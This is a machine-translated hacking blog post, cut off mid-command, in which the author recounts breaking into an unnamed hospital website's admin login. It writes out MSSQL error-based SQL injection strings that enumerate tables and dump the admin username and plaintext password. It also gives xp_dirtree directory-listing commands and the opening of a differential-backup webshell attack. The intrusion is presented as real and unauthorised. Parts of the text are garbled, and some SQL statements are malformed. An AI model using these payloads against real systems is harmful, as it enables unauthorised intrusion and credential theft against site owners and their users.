Inject shell into the background login box

By Ay shadow

I was studying Java and was scratching my head. My friend suddenly lost a website, saying that there were no injection points at the front desk and no upload points for him, he said there was an injection point the day after tomorrow, but he said that he was not competent enough to give it a try. So I put down my work and opened the website.
Open the website (the website will not be published, just talk about the process), is a hospital site, read the website program, is asp, Xi, asp site more than a day, it is a little friendly. Just click a news link and add a single quotation mark. A dialog box is displayed.
 

It seems a little preventive. To determine whether it is an anti-injection system, if so, we can try cookie injection. So I changed the method to detect it, that is
Http://www.xxx.com/kssz.asp? BcgID = 104 & ThatBcgID = 65 & MainBcgID = 102-0
Add 0 after the number and press enter to bring up the same prompt dialog box, submit separately
Http://www.xxx.com/kssz.asp? BcgID = 104 & ThatBcgID = 65-0 & MainBcgID = 102
Http://www.xxx.com/kssz.asp? BcgID = 104-0 & ThatBcgID = 65 & MainBcgID = 102
They are all the same prompts. It seems that the program is filtered out, not to prevent injection.
Then I opened Google and searched for asp? The result of the link id = is the same, and the injection is useless.
Next, I used my own scanning tool to scan common upload points and did not find it. It seems that I can only enter the background input box.
Enter a single quotation mark in the background, enter the password casually, and press Enter. An error is returned.
 
It seems that my friend is right. It's a joke, and it's mssql. Fortunately, it's mssql, or it won't be enough (the reason will be mentioned later)
Then, according to the general steps, the injection started, but I was a lazy person and wanted to steal some laziness, So I captured the packet and wanted to inject it through get. This would allow tools to replace manpower, haha,
 
Therefore, combine the content
Www.xxx.com/login/default.asp? Submit = % B5 % C7 + % C2 % BC & Userpwd = 1& Amp; Username = 1
But God does not cooperate with me. This method won't work here. Ah, it seems that it can only be done manually. This is quite painful for me.
Meters, honestly step by step. Enter 'having 1 = 1 and ''= 'in the input box and press Enter. An error is returned.

Hey, I'm proud to laugh. Here, we get the table name and field name, continue to burst, enter 'group by user_info.user_id having 1 = 1 and ''='

User_name burst, continue to burst, 'Group by user_info.user_id, user_info.user_name having 1 = 1 and ''='
 
It's almost the same here. We have all the keyword fields and the table name. It's a burst of content. Enter
'And 1 = (select user_name from user_info) and' = 'the user name is displayed.

Then, in the same way, enter 'and 1 = (select user_pwd from user_info) and' = 'to open the password. Haha found that the password is still not encrypted, and that would be better.
Directly pick up the password and enter the background

I thought it would be easy to get the shell next time. I randomly found an upload point and tried to directly upload the file, prompting me That the upload was successful. Haha, I am happy. I am happy. Today, rp is good, I just spent some time in the manual work. Now I just made up and got the shell directly. So I opened it with the address. As a result, I vomited blood on the spot. Why, because the folder in the upload path does not allow script execution.

I am so angry with this administrator, shit, shit, and shit. He JJ makes Lao Tzu happy. The folder paths of other images are the same, so you are not allowed to execute the script. Ah, heaven, earth, how can you treat me like this. I thought there was no way to use the shell. I was ready to give up. I told my friend that I could use a differential backup in the background to get the shell. I heard it, one shot of my thigh, right, MMB, why did I not think of it? Ah, I forgot the mssql injection in the background and despised myself.
To perform differential backup, you must first know the site. Well, the most troublesome manual task is to start again. Now, let's put a sentence here. I hope you must study SQL well. The tool is dead, people are active, but they are very manual. Despite the trouble (audience: We started to pretend to be forced again. Please be careful when you go out and get thundered ..... Me: Haha, I am not afraid. I am an insulator. It's okay ..... Suddenly, the sky burst, and the shadow was thundered... 55555555. I didn't see the yellow calendar today)
Start to guess the path. The process is: Create a table and use the xp_dirtree component to insert the column content into the temporary table. Then we read the content from the temporary table one by one.
First, create a table and enter 'create talbe tmp (id int identity (255), path varchar (), depth int, isfile int) and ''='
Then, we need to confirm whether our table has been successfully created. Otherwise, if it fails, what we will do later will be useless. Input 'select * from tmp having 1 = 1 and ''= '. An error is returned, indicating that the table is successfully created.
 
Next, the content is inserted.
'Insert into tmp exec master. dbo. xp_dirtree 'd: ', 1, 1, and ''='
Then, you can column the Directory and enter
'And 1 = (select path from tmp where id = N) and' = '(N = 1, 2, 4, 5 ,......)
The path is listed.

You can change the value of N to list it. If you repeat the process, you will not write it. The path is D: websitexxx.com.
Next, perform differential backup. In the input box, enter a differential backup statement.
Alter database hz3yy set recovery full --
Drop table [banlg]; create table [dbo